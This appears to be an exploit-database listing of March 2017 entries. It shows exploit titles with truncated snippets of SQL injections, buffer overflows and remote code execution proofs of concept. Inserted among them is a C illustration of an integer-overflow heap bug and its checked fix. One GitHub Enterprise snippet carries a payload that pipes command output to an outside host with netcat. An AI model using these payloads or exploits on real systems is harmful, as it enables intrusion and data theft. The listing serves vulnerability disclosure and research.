Wordpress Plugin Membership Simplified 1.58 - Arbitrary File Download
import requests import string import random from urlparse import urlparse print "---------------------------------------------------------------------" print "Wordpress Plugin Membership Simplified v1.58 - Arbitrary File...
Microsoft Windows DVD Maker 6.1.7 - XML External Entity Injection
+ Credits: John Page AKA hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-DVD-MAKER-XML-EXTERNAL-ENTITY-FILE-DISCLOSURE.txt + ISR: ApparitionSec Vendor: =================...
Microsoft Edge 38.14393.0.0 - JavaScript Engine Use-After-Free
f.onload = null; for (var x in window) { if (whitelist.indexOf(x) != -1) continue; try { window.__lookupGetter__(x).call(f.contentWindow); log(x); } catch (e) {} } f.src = "https://abc.xyz/"; document.body.appendChild(f); And after some plays, finally reached an...
CommVault Edge 11 SP6 - Stack Buffer Overflow (PoC)
import socket import binascii import time import struct s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(1) s.connect(("10.101.0.85", 8400)) def sr(p=None, r=None): if p: print "sending %d bytes: %s " % (len(p)/2, p) payl = binascii.a2b_hex(p...
Cerberus FTP Server 8.0.10.3 - MLST Buffer Overflow (PoC)
+ Title: Cerberus FTP Server 8.0.10.3 – 'MLST' Remote Buffer Overflow + Credits / Discovery: Nassim Asrir + Author Contact: [email protected] || https://www.linkedin.com/in/nassim-asrir-b73a57122/ + Author Company: Henceforth + CVE:...
Cobbler 2.8.0 - (Authenticated) Remote Code Execution
#!/usr/bin/python """ Exploit title: Cobbler 2.8.x Authenticated RCE. Author: Dolev Farhi Contact: dolevf at protonmail.com @hack6tence Date: 03-16-2017 Vendor homepage: cobbler.github.io Software version: v.2.5.160805 Software Description...
Microsoft Windows - COM Session Moniker Privilege Escalation (MS17-012)
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1021 Windows: COM Session Moniker EoP Platform: Tested on Windows 10 14393, Server 2012 R2 Class: Elevation of Privilege Summary: When activating an object usi...
Adobe Flash - MovieClip Attach init Object Use-After-Free
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1006 The attached file causes a use-after-free in attaching a MovieClip and applying the init object. Proof of Concept:...
Microsoft Windows - LoadUvsTable() Heap Buffer Overflow
Date: 15-03-2017 Author: Hossein Lotfi https://twitter.com/hosselot CVE: CVE-2016-7274 1. Description An integer overflow error within the "LoadUvsTable" function of usp10.dll can be exploited to cause a heap-based buffer overflow. Full analys...
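The entry above describes CVE-2016-7274 as an integer overflow in a size computation that turns into a heap-based buffer overflow. The C below is an added illustration of that bug class, not the usp10.dll code and not the author's analysis: the table layout, RECORD_SIZE, the sample bytes and every function name are constructed for this example. It shows a 32-bit count-times-size product wrapping to a tiny allocation, and the overflow-safe check a loader should apply before trusting the count.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

/* Constructed table layout for this example (not the real UVS/cmap layout):
 * a big-endian 32-bit record count, then `count` records of RECORD_SIZE bytes. */
#define RECORD_SIZE 11u

static uint32_t be32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}

/* The bug pattern: the allocation size is computed in 32-bit arithmetic, so
 * count * RECORD_SIZE silently wraps for large counts. The copy loop that
 * follows in real code trusts `count`, so it writes far past a buffer that is
 * only a few bytes long. The wrapped size is returned here instead of doing
 * that copy so the example is safe to run. */
uint32_t alloc_size_unchecked(uint32_t count)
{
    return count * RECORD_SIZE;              /* wraps modulo 2^32 */
}

/* The fix: refuse counts whose product would wrap, and refuse tables that
 * claim more records than the payload actually holds. Returns 0 when the
 * count is rejected, otherwise the exact number of bytes to allocate. */
size_t checked_size_or_zero(uint32_t count, size_t payload_len)
{
    if (count == 0 || count > UINT32_MAX / RECORD_SIZE)
        return 0;                            /* zero or would wrap */
    uint64_t need = (uint64_t)count * RECORD_SIZE;
    if (need > payload_len)
        return 0;                            /* truncated input */
    return (size_t)need;
}

/* Loader that copies only after the checked computation. Returns the number
 * of records copied, or -1 if the table is rejected. Caller owns *records. */
long load_table(const uint8_t *buf, size_t len, uint8_t **records)
{
    *records = NULL;
    if (len < 4)
        return -1;
    uint32_t count = be32(buf);
    if (count == 0)
        return 0;
    size_t bytes = checked_size_or_zero(count, len - 4);
    if (bytes == 0)
        return -1;
    *records = malloc(bytes);
    if (*records == NULL)
        return -1;
    memcpy(*records, buf + 4, bytes);
    return (long)count;
}

/* Same loader, returning only the verdict and freeing the copy. */
long load_table_count(const uint8_t *buf, size_t len)
{
    uint8_t *records;
    long n = load_table(buf, len, &records);
    free(records);
    return n;
}

/* Constructed samples. SAMPLE_GOOD declares 2 records and carries 22 bytes.
 * SAMPLE_BAD declares 0x1745D175 records: 0x1745D175 * 11 = 2^32 + 7, so the
 * unchecked product wraps to 7 bytes while the count is about 390 million. */
const uint8_t SAMPLE_GOOD[4 + 2 * RECORD_SIZE] = { 0x00, 0x00, 0x00, 0x02 };
const uint8_t SAMPLE_BAD[4] = { 0x17, 0x45, 0xD1, 0x75 };

int main(void)
{
    uint32_t bad_count = be32(SAMPLE_BAD);
    printf("benign table: %ld records loaded\n",
           load_table_count(SAMPLE_GOOD, sizeof SAMPLE_GOOD));
    printf("count 0x%08x: unchecked size %u bytes, checked loader returns %ld\n",
           (unsigned)bad_count, (unsigned)alloc_size_unchecked(bad_count),
           load_table_count(SAMPLE_BAD, sizeof SAMPLE_BAD));
    return 0;
}
```

The check divides instead of multiplying (`count > UINT32_MAX / RECORD_SIZE`) so the comparison itself cannot overflow, and it is paired with a bound against the real input length; either check alone leaves a path to an undersized buffer or an over-read of the input.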
GitHub Enterprise 2.8.7 - Remote Code Execution
#!/usr/bin/python from urllib import quote ''' set up the marshal payload from IRB code = "id | nc orange.tw 12345" p "\x04\x08" + "o"+":\x40ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy"+"\x07" + ":\x0E@instance" + "o"+":\x08ERB"+"\x07...
Adobe Flash - ATF Thumbnailing Heap Overflow
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1015 The attached file causes a heap overflow in ATF thumbnailing. To reproduce, place both attached files on a server and visit http://127.0.0.1/LoadImage.swf?img=thumb2.atf Proof of...
Joomla! Component Vik Appointments 1.5 - SQL Injection
Exploit Title: Joomla! Component Vik Appointments v1.5 - SQL Injection Google Dork: inurl:index.php?option=com_vikappointments Date: 15.03.2017 Vendor Homepage: https://extensionsforjoomla.com/ Software :...
GitHub Enterprise 2.8.0 < 2.8.6 - Remote Code Execution
#!/usr/bin/ruby require "openssl" require "cgi" require "net/http" require "uri" SECRET = "641dd6454584ddabfed6342cc66281fb" puts (ASCII-art banner)...
PCAUSA Rawether (ASUS PCE-AC56 WLAN Card Utilities Windows 10 x64) - Local Privilege Escalation
Exploit Title: PCAUSA Rawether for Windows local privilege escalation Date: 2017-03-15 Exploit Author: ReWolf Vendor Homepage: original vendor website doesn't exist anymore Version: too many Tested on:...
Sitecore CMS 8.1 Update-3 - Cross-Site Scripting
Exploit Title: Stored Cross-Site Scripting (XSS) in Sitecore Experience Platform 8.1 Update-3 Date: March 15, 2017 Exploit Author: Pralhad Chaskar Vendor Homepage: http://www.sitecore.net/en Version: 8.1 rev. 160519 Tested on: Sitecore Experience...
Adobe Flash - ATF Planar Decompression Heap Overflow
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1016 The attached file causes heap corruption when decompressing a planar block. To reproduce the issue, put both attached files on a server and visit:...
Adobe Flash - AVC Header Slicing Heap Overflow
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1017 There is a heap overflow in AVC header slicing. To reproduce the issue, put the attached files on a server and visit http://127.0.0.1/LoadImage.swf?img=slice.flv Proof of Concept:...
Joomla! Component Vik Rent Items 1.3 - SQL Injection
Exploit Title: Joomla! Component Vik Rent Items v1.3 - SQL Injection Google Dork: inurl:index.php?option=com_vikrentitems Date: 15.03.2017 Vendor Homepage: https://extensionsforjoomla.com/ Software :...
Adobe Flash - Metadata Parsing Out-of-Bounds Read
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1005 The attached file causes an out-of-bounds read when its metadata is parsed. Proof of Concept:...
Joomla! Component Vik Rent Car 1.11 - SQL Injection
Exploit Title: Joomla! Component Vik Rent Car v1.11 - SQL Injection Google Dork: inurl:index.php?option=com_vikrentcar Date: 15.03.2017 Vendor Homepage: https://extensionsforjoomla.com/ Software :...
Joomla! Component Advertisement Board 3.0.4 - id SQL Injection
Exploit Title: Joomla! Component Advertisement Board v3.0.4 - SQL Injection Google Dork: inurl:index.php?option=com_advertisementboard Date: 14.03.2017 Vendor Homepage: http://ordasoft.com/ Software :...
APNGDis 2.8 - image width/height chunk Heap Buffer Overflow
Exploit Title: APNGDis image width / height Buffer Overflow Date: 14-03-2017 Exploit Author: Alwin Peppels Vendor Homepage: http://apngdis.sourceforge.net/ Software Link: https://sourceforge.net/projects/apngdis/files/2.8/ Version: 2.8...
APNGDis 2.8 - chunk size descriptor Heap Buffer Overflow
Exploit Title: APNGDis chunk size descriptor Buffer Overflow Date: 14-03-2017 Exploit Author: Alwin Peppels Vendor Homepage: http://apngdis.sourceforge.net/ Software Link: https://sourceforge.net/projects/apngdis/files/2.8/ Version: 2.8...
Joomla! Component Simple Membership 3.3.3 - userId SQL Injection
Exploit Title: Joomla! Component Simple Membership v3.3.3 - SQL Injection Google Dork: inurl:index.php?option=com_simplemembership Date: 14.03.2017 Vendor Homepage: http://ordasoft.com/ Software :...
APNGDis 2.8 - filename Stack Buffer Overflow (PoC)
Exploit Title: APNGDis filename Buffer Overflow Date: 14-03-2017 Exploit Author: Alwin Peppels Vendor Homepage: http://apngdis.sourceforge.net/ Software Link: https://sourceforge.net/projects/apngdis/files/2.8/ Version: 2.8 Tested on: Linux Debian ...
Cerberus FTP Server 8.0.10.1 - Denial of Service
Exploit Title: Cerberus FTP server – Denial of Service Date: 2017-03-13 Exploit Author: Peter Baris Vendor Homepage: https://www.cerberusftp.com/ Software Link: download link if available Version: 8.0.10.1 Tested on: Windows Server 2008 R2 Standard...
Oracle VM VirtualBox - Cooperating VMs can Escape from Shared Folder
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1037 There is a security issue in the shared folder implementation that permits cooperating guests with write access to the same shared folder to gain access to t...
Car Workshop System - SQL Injection
Exploit Title: Car Workshop System - SQL Injection Google Dork: N/A Date: 13.03.2017 Vendor Homepage: http://prosoft-apps.com/ Software: https://codecanyon.net/item/car-workshop-system/19562074 Demo: http://workshop.prosoft-apps.com/ Version: N/A Tested on: Win...
Steam Profile Integration 2.0.11 - SQL Injection
Exploit Title: IPS Community Suite - Steam Profile Integration 2.0.11 and below SQL injection Google Dork: inurl:tab=nodesteamsteamprofile Date: 13/03/2017 Exploit Author: DrWhat Vendor Homepage:...
Easy MOV Converter 1.4.24 - Local Buffer Overflow (SEH)
#!/usr/bin/python Exploit Title : Easy MOV Converter - 'Enter User Name' Field SEH Overwrite POC Date : 12/03/2017 Exploit Author : Muhann4d Vendor Homepage : http://www.divxtodvd.net/ Software Link : http://www.divxtodvd.net/easymovconverter.e...
Nintendo Switch - WebKit Code Execution (PoC)
CVE-2016-4657 Switch PoC body { font-size: 2em; } a { text-decoration: none; color: #000; } a:hover { color: #f00; font-weight: bold; } CVE-2016-4657 Nintendo Switch PoC go! reload waiting... click go. // display JS errors as alerts. Helps debugging. window.onerror =...
Domain Marketplace Script - SQL Injection
Exploit Title: Domain Marketplace Script - SQL Injection Google Dork: N/A Date: 11.03.2017 Vendor Homepage: http://scripteen.com/ Software: http://scripteen.com/item/scripts/scripteen-domain-marketplace-script.html Demo: http://dwm.domainauctionsscript.co...
Vanelo - SQL Injection
Exploit Title: Vanelo – Wanelo Clone - SQL Injection Google Dork: N/A Date: 11.03.2017 Vendor Homepage: https://www.zoplay.com/ Software: https://www.zoplay.com/web/trending-marketplace-website/ Demo: http://wanelo.zoplay.com/ Version: N/A Tested on: Win7 x64, Kali Linux x6...
MobaXterm Personal Edition 9.4 - Directory Traversal
+ Credits: John Page AKA hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/MOBAXTERM-TFTP-PATH-TRAVERSAL-REMOTE-FILE-ACCESS.txt + ISR: ApparitionSec Vendor: =====================...
Travel Tours Script 2.0 - SQL Injection
Exploit Title: Travel Tours Script v2.0 - SQL Injection Google Dork: N/A Date: 11.03.2017 Vendor Homepage: https://www.phpjabbers.com/ Software: https://www.phpjabbers.com/travel-tours-script/ Demo: http://demo.phpjabbers.com/index.php?demo=vpl&front=1&lid=...
Pet Listing Script 3.0 - SQL Injection
Exploit Title: Pet Listing Script v3.0 - SQL Injection Google Dork: N/A Date: 11.03.2017 Vendor Homepage: https://www.phpjabbers.com/ Software: https://www.phpjabbers.com/pet-listing-script/ Demo: http://demo.phpjabbers.com/index.php?demo=petls&front=1&lid=1...
Mirage - SQL Injection
Exploit Title: Mirage – Fancy Clone - SQL Injection Google Dork: N/A Date: 11.03.2017 Vendor Homepage: https://www.zoplay.com/ Software: https://www.zoplay.com/web/multi-vendor-clone-website/ Demo: http://fancyclone.zoplay.com/ Version: N/A Tested on: Win7 x64, Kali Linux x...
Property Listing Script 3.1 - SQL Injection
Exploit Title: Property Listing Script v3.1 - SQL Injection Google Dork: N/A Date: 11.03.2017 Vendor Homepage: https://www.phpjabbers.com/ Software: https://www.phpjabbers.com/property-listing-script/ Demo:...
Global In - SQL Injection
Exploit Title: Global In – A LinkedIn Clone - SQL Injection Google Dork: N/A Date: 11.03.2017 Vendor Homepage: https://www.techbizstudio.com/ Software: https://www.techbizstudio.com/product/linkedin-clone/ Demo: https://www.techbizstudio.com/demo/globalin/ Version: N/A...
Yellow Pages Script 3.2 - category_id SQL Injection
Exploit Title: Yellow Pages Script v3.2 - SQL Injection (category_id parameter) Google Dork: N/A Date: 11.03.2017 Vendor Homepage: https://www.phpjabbers.com/ Software: https://www.phpjabbers.com/yellow-pages-script/ Demo:...
Global In - Arbitrary File Upload
Exploit Title: Global In - Arbitrary File Upload Google Dork: N/A Date: 11.03.2017 Vendor Homepage: https://www.techbizstudio.com/ Software: https://www.techbizstudio.com/product/linkedin-clone/ Demo: https://www.techbizstudio.com/demo/globalin/ Version: N/A Test...
PHP Forum Script 3.0 - SQL Injection
Exploit Title: PHP Forum Script v3.0 - SQL Injection Google Dork: N/A Date: 11.03.2017 Vendor Homepage: https://www.phpjabbers.com/ Software: https://www.phpjabbers.com/php-forum-script/ Demo: http://demo.phpjabbers.com/index.php?demo=pfs&front=1&lid=1 Version...
Fiyo CMS 2.0.6.1 - Privilege Escalation
Exploit Title: Fiyo CMS 2.0.6.1 allows remote authenticated users to gain privileges via a modified level parameter Google Dork: no Date: 11-03-2017 Exploit Author: @runggareksya, @dvnrcy Vendor Homepage: http://www.fiyo.org Software Link:...
Fortinet FortiClient 5.2.3 (Windows 10 x86) - Local Privilege Escalation
Yacht Listing Script 2.0 - SQL Injection
Exploit Title: Yacht Listing Script v2.0 - SQL Injection Google Dork: N/A Date: 11.03.2017 Vendor Homepage: https://www.phpjabbers.com/ Software: https://www.phpjabbers.com/yacht-listing-script/ Demo:...
Kinsey Infor/Lawson ESBUS - SQL Injection
Exploit Title: Kinsey Infor / Lawson ESBUS - Multiple SQL Injections Date: 3/10/2017 Exploit Author: Michael Benich Vendor homepage: http://www.kinsey.com/infor-lawson.html Version: ALL Tested on: Windows Server 2008 R2; MySQL ver 5.5 CVE: CVE-2017-6550...
dnaLIMS DNA Sequencing - Directory Traversal / Session Hijacking / Cross-Site Scripting
Title: Multiple vulnerabilities discovered in dnaLIMS DNA sequencing web-application Advisory URL: https://www.shorebreaksecurity.com/blog/product-security-advisory-psa0002-dnalims/ Date published: Mar 08, 2017...
FTP Voyager Scheduler 16.2.0 - Cross-Site Request Forgery
+ Credits: John Page AKA hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/FTP-VOYAGER-SCHEDULER-CSRF-REMOTE-CMD-EXECUTION.txt + ISR: ApparitionSec Vendor: ============== solarwinds.com...
WatchGuard XTMv 11.12 Build 516911 - User Management Cross-Site Request Forgery
KL-001-2017-004 : WatchGuard XTMv User Management Cross-Site Request Forgery Title: WatchGuard XTMv User Management Cross-Site Request Forgery Advisory ID: KL-001-2017-004 Publication Date: 2017.03.10 Publication...
BistroStays 3.0 - guests SQL Injection
Exploit Title: BistroStays - Vacation Rental Software v3.0 - SQL Injection Google Dork: N/A Date: 09.03.2017 Vendor Homepage: https://www.ncrypted.net/ Software: https://www.ncrypted.net/bistrostays Demo: http://demo.ncryptedprojects.com/bistrostaysv3/...